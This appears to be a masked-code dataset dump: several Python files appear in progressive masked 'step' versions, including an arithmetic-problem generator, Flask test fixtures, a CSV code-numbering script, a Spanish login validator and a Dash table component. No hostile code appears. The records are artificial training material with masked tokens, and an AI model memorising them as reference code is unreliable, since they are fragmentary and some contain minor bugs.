stack.append(('%s%s%s' % (item1, e, item2), 2))
elif priority == 1:
"""
                A unary operation: parenthesize anything that is not a bare operand.
"""
item, prio = stack.pop()
if prio:
item = '(%s)' % item
if e == '²':
stack.append(('%s%s' % (item, '²'), 1))
else:
stack.append(('%s%s' % (e, item), 1))
return stack[0][0]
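# Editor's note: illustrative usage appended here, not part of the original
# snippet; the levels follow the generate() docstring above.
if __name__ == '__main__':
    for level in (0, 1, 2):
        print(level, Generator.generate(level))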
|
normal
|
{
"blob_id": "6e3bb17696953256af6d8194128427acebf1daac",
"index": 524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Generator:\n <mask token>\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-3": "<mask token>\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-4": "from random import randint, shuffle\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
import os
import pytest
def get_client():
from apiserver import app, is_caching_enabled
app.config['TESTING'] = True
app.enable_cache(is_caching_enabled())
return app.test_client()
@pytest.fixture
def client():
os.environ['FLASK_ENV'] = 'testing'
yield get_client()
@pytest.fixture
def client_with_caching():
os.environ['FLASK_ENV'] = 'production'
yield get_client()
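# Editor's note: a hypothetical consumer of the fixtures above, appended for
# illustration; the '/status' route is an assumption, not part of the
# apiserver module imported here.
def test_status(client):
    response = client.get('/status')
    assert response.status_code in (200, 404)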
|
normal
|
{
"blob_id": "c0b5a0605bdfcb7cb84211d3ad0d24f78f838cdf",
"index": 5421,
"step-1": "<mask token>\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\[email protected]\ndef client_with_caching():\n os.environ['FLASK_ENV'] = 'production'\n yield get_client()\n",
"step-4": "import os\nimport pytest\n\n\ndef get_client():\n from apiserver import app, is_caching_enabled\n app.config['TESTING'] = True\n app.enable_cache(is_caching_enabled())\n return app.test_client()\n\n\[email protected]\ndef client():\n os.environ['FLASK_ENV'] = 'testing'\n yield get_client()\n\n\[email protected]\ndef client_with_caching():\n os.environ['FLASK_ENV'] = 'production'\n yield get_client()\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
        print('csv file does not exist, try again:')
return get_csv_path()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
        print('csv file does not exist, try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
        print('csv file does not exist, try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
if __name__ == '__main__':
unique_code()
<|reserved_special_token_1|>
import re
import pandas as pd
import os
def get_csv_path():
path = input('enter csv path:')
if os.path.isfile(path):
return path
else:
        print('csv file does not exist, try again:')
return get_csv_path()
def unique_code():
path = get_csv_path()
path_dir = os.path.dirname(path)
frame1 = pd.read_csv(path, encoding='utf-8')
list1 = list(frame1.iloc[:, 0])
pat1 = re.compile('\\d+-\\d+')
pat2 = re.compile('-\\D{1}-\\d+')
list2 = []
i = 100
for code in list1:
if code == '':
list2.append(i)
i += 100
elif re.match(pat1, code):
cover = code
list2.append(cover)
else:
list2.append(cover + code)
frame2 = pd.DataFrame(list2)
frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=
'utf-8-sig')
if __name__ == '__main__':
unique_code()
<|reserved_special_token_1|>
# In the default format of highway-engineering bill-of-quantities codes, parent nodes are numeric and child nodes take the "-letter" form; this script rewrites them into unique codes so the data is easier to process
import re
import pandas as pd
import os
def get_csv_path():  # the original codes are stored as one csv column, for easy reading
path=input('enter csv path:')
if os.path.isfile(path):
return path
else:
        print('csv file does not exist, try again:')
return get_csv_path()
def unique_code():
path=get_csv_path()
path_dir=os.path.dirname(path)
frame1=pd.read_csv(path,encoding='utf-8')
list1=list(frame1.iloc[:,0])
    pat1=re.compile(r'\d+-\d+')  # matches digit-led parent-node codes
    pat2=re.compile(r'-\D{1}-\d+')  # matches second-level child nodes of the form -letter-number
list2=[]
i=100
for code in list1:
if code=='':
list2.append(i)
i+=100
elif re.match(pat1,code):
cover=code
list2.append(cover)
else:
list2.append(cover+code)
frame2=pd.DataFrame(list2,)
frame2.to_csv(os.path.join(path_dir,'code_csv_out.csv'),encoding='utf-8-sig')
if __name__=='__main__':
unique_code()

|
flexible
|
{
"blob_id": "857e3e04b99cb346fd89b34c0d14957d65b7ac38",
"index": 9566,
"step-1": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\nif __name__ == '__main__':\n unique_code()\n",
"step-4": "import re\nimport pandas as pd\nimport os\n\n\ndef get_csv_path():\n path = input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\n\n\ndef unique_code():\n path = get_csv_path()\n path_dir = os.path.dirname(path)\n frame1 = pd.read_csv(path, encoding='utf-8')\n list1 = list(frame1.iloc[:, 0])\n pat1 = re.compile('\\\\d+-\\\\d+')\n pat2 = re.compile('-\\\\D{1}-\\\\d+')\n list2 = []\n i = 100\n for code in list1:\n if code == '':\n list2.append(i)\n i += 100\n elif re.match(pat1, code):\n cover = code\n list2.append(cover)\n else:\n list2.append(cover + code)\n frame2 = pd.DataFrame(list2)\n frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding=\n 'utf-8-sig')\n\n\nif __name__ == '__main__':\n unique_code()\n",
"step-5": "#公路工程工程量清单编码默认格式母节点为数字型式,子节点为-b字母形式,为使编码唯一便于数据处理,编制此脚本\nimport re\nimport pandas as pd\nimport os\ndef get_csv_path():#原编码保存为csv文件的一列,便于读取\n path=input('enter csv path:')\n if os.path.isfile(path):\n return path\n else:\n print('csv file not exsit,try again:')\n return get_csv_path()\ndef unique_code():\n path=get_csv_path()\n path_dir=os.path.dirname(path)\n frame1=pd.read_csv(path,encoding='utf-8')\n list1=list(frame1.iloc[:,0])\n pat1=re.compile(r'\\d+-\\d+')#数字打头的母节点匹配符\n pat2=re.compile(r'-\\D{1}-\\d+')#二级子节点,即-字母-数字形式匹配符\n list2=[]\n i=100\n for code in list1:\n if code=='':\n list2.append(i)\n i+=100\n elif re.match(pat1,code):\n cover=code\n list2.append(cover)\n else:\n list2.append(cover+code)\n frame2=pd.DataFrame(list2,)\n frame2.to_csv(os.path.join(path_dir,'code_csv_out.csv'),encoding='utf-8-sig')\nif __name__=='__main__':\n unique_code()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
        print('Los valores del usuario deben ser únicamente letras o números')
usuario()
else:
print(True)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
        print('Los valores del usuario deben ser únicamente letras o números')
usuario()
else:
print(True)
def contraseña():
global passw
passw = input('Introduce contraseña: ')
if len(passw) <= 9:
        print('La contraseña debe tener al menos 10 caracteres')
contraseña()
elif passw.isalnum() == True:
print('La contraseña debe tener al menos un carácter no alfanumérico')
contraseña()
elif passw.lower() == passw:
print('Debe haber por lo menos una mayúscula')
contraseña()
elif passw.upper() == passw:
print('Debe haber por lo menos una minúscula')
contraseña()
for i in passw:
if i == ' ':
print('La contraseña no debe tener espacios en blanco')
contraseña()
print(True)
<|reserved_special_token_1|>
from bbdd import *
def usuario():
global usser
usser = input('Introduce un usuario : ')
if len(usser) < 5 or len(usser) > 15:
print('El usuario debe tener entre 5 y 15 caracteres')
usuario()
elif usser.isalnum() == False:
        print('Los valores del usuario deben ser únicamente letras o números')
usuario()
else:
print(True)
def contraseña():
global passw
passw = input('Introduce contraseña: ')
if len(passw) <= 9:
        print('La contraseña debe tener al menos 10 caracteres')
contraseña()
elif passw.isalnum() == True:
print('La contraseña debe tener al menos un carácter no alfanumérico')
contraseña()
elif passw.lower() == passw:
print('Debe haber por lo menos una mayúscula')
contraseña()
elif passw.upper() == passw:
print('Debe haber por lo menos una minúscula')
contraseña()
for i in passw:
if i == ' ':
print('La contraseña no debe tener espacios en blanco')
contraseña()
print(True)
<|reserved_special_token_1|>
from bbdd import *
def usuario():
global usser
usser=input("Introduce un usuario : ")
if len(usser)<5 or len(usser)>15:
print("El usuario debe tener entre 5 y 15 caracteres")
usuario()
elif usser.isalnum()==False:
print("Los valores del usurio deben ser únicamente letras o números")
usuario()
else:
print(True)
def contraseña():
global passw
passw=input("Introduce contraseña: ")
if len(passw)<=9:
print("La contraseña debe tener al menos 10 caractéres")
contraseña()
elif passw.isalnum()==True:
print ("La contraseña debe tener al menos un carácter no alfanumérico")
contraseña()
elif passw.lower() == passw:
print("Debe haber por lo menos una mayúscula")
contraseña()
elif passw.upper()==passw:
print("Debe haber por lo menos una minúscula")
contraseña()
for i in passw:
if i==" ":
print("La contraseña no debe tener espacios en blanco")
contraseña()
print(True)
|
flexible
|
{
"blob_id": "ce75c23c6b0862dde797225f53c900b4ebc56428",
"index": 514,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\ndef contraseña():\n global passw\n passw = input('Introduce contraseña: ')\n if len(passw) <= 9:\n print('La contraseña debe tener al menos 10 caractéres')\n contraseña()\n elif passw.isalnum() == True:\n print('La contraseña debe tener al menos un carácter no alfanumérico')\n contraseña()\n elif passw.lower() == passw:\n print('Debe haber por lo menos una mayúscula')\n contraseña()\n elif passw.upper() == passw:\n print('Debe haber por lo menos una minúscula')\n contraseña()\n for i in passw:\n if i == ' ':\n print('La contraseña no debe tener espacios en blanco')\n contraseña()\n print(True)\n",
"step-4": "from bbdd import *\n\n\ndef usuario():\n global usser\n usser = input('Introduce un usuario : ')\n if len(usser) < 5 or len(usser) > 15:\n print('El usuario debe tener entre 5 y 15 caracteres')\n usuario()\n elif usser.isalnum() == False:\n print('Los valores del usurio deben ser únicamente letras o números')\n usuario()\n else:\n print(True)\n\n\ndef contraseña():\n global passw\n passw = input('Introduce contraseña: ')\n if len(passw) <= 9:\n print('La contraseña debe tener al menos 10 caractéres')\n contraseña()\n elif passw.isalnum() == True:\n print('La contraseña debe tener al menos un carácter no alfanumérico')\n contraseña()\n elif passw.lower() == passw:\n print('Debe haber por lo menos una mayúscula')\n contraseña()\n elif passw.upper() == passw:\n print('Debe haber por lo menos una minúscula')\n contraseña()\n for i in passw:\n if i == ' ':\n print('La contraseña no debe tener espacios en blanco')\n contraseña()\n print(True)\n",
"step-5": "from bbdd import *\n\n\ndef usuario():\n global usser\n usser=input(\"Introduce un usuario : \")\n if len(usser)<5 or len(usser)>15:\n print(\"El usuario debe tener entre 5 y 15 caracteres\")\n usuario()\n elif usser.isalnum()==False:\n print(\"Los valores del usurio deben ser únicamente letras o números\")\n usuario()\n else:\n print(True)\n\n\n\ndef contraseña():\n global passw\n passw=input(\"Introduce contraseña: \")\n if len(passw)<=9:\n print(\"La contraseña debe tener al menos 10 caractéres\")\n contraseña()\n elif passw.isalnum()==True:\n print (\"La contraseña debe tener al menos un carácter no alfanumérico\")\n contraseña()\n elif passw.lower() == passw:\n print(\"Debe haber por lo menos una mayúscula\")\n contraseña()\n elif passw.upper()==passw:\n print(\"Debe haber por lo menos una minúscula\")\n contraseña()\n\n for i in passw:\n if i==\" \":\n print(\"La contraseña no debe tener espacios en blanco\")\n contraseña()\n print(True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import dash_table
import pandas as pd
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
from dash_oop_components import DashComponent
import dash_table
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output, State
from dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp
from src.main.python.oop.Dataframe import Dataframe
from src.main.python.oop.Figure_factories import VisualFactories
class Table(DashComponent):
def __init__(self, plot_factory, df, title="Table"):
"""
Displays table at the bottom of the page.
:param plot_factory: Factory with all plot functions
:param df: Dataframe with all data
:param title: Title of the page
"""
super().__init__(title=title)
self.plot_factory = plot_factory
self.df = df
def layout(self, params=None):
"""
Shows the html layout of the table component.
:param params: Parameters selected at the current level of the dashboard.
:return: Html layout of the program.
"""
return html.Div([
dcc.Loading(
id="loading-icon3",
children=[html.Div(id='output-data-upload')],
type="dot",
)
])
def component_callbacks(self, app):
"""
Automatically does the callbacks of the interactive parts of the table component.
:param app: Dash app that uses the code.
:return: Output of the callback functions.
"""
@app.callback(
Output('main_table', 'selected_rows' + self.title),
Input('Mygraph-normal-plot', 'selectedData'))
def display_selected_data(graphPoints):
"""
            Display the selected data in the table.
            :param graphPoints: Points currently selected on the graph.
:return: Table
"""
points_selected = []
if graphPoints is not None:
print(graphPoints)
for point in graphPoints['points']:
points_selected.append(point['customdata'][0])
return points_selected
def set_data(self, df):
"""
        Replaces the dataframe that backs this table component.
        :param df: New dataframe with all data.
"""
self.df = df
|
normal
|
{
"blob_id": "485f85ec5e3f38148978453ea5e7f9a54eb310e1",
"index": 160,
"step-1": "<mask token>\n\n\nclass Table(DashComponent):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n\n @app.callback(Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df\n",
"step-4": "import dash_table\nimport pandas as pd\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nfrom dash_oop_components import DashComponent\nimport dash_table\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp\nfrom src.main.python.oop.Dataframe import Dataframe\nfrom src.main.python.oop.Figure_factories import VisualFactories\n\n\nclass Table(DashComponent):\n\n def __init__(self, plot_factory, df, title='Table'):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([dcc.Loading(id='loading-icon3', children=[html.Div\n (id='output-data-upload')], type='dot')])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n\n @app.callback(Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df\n",
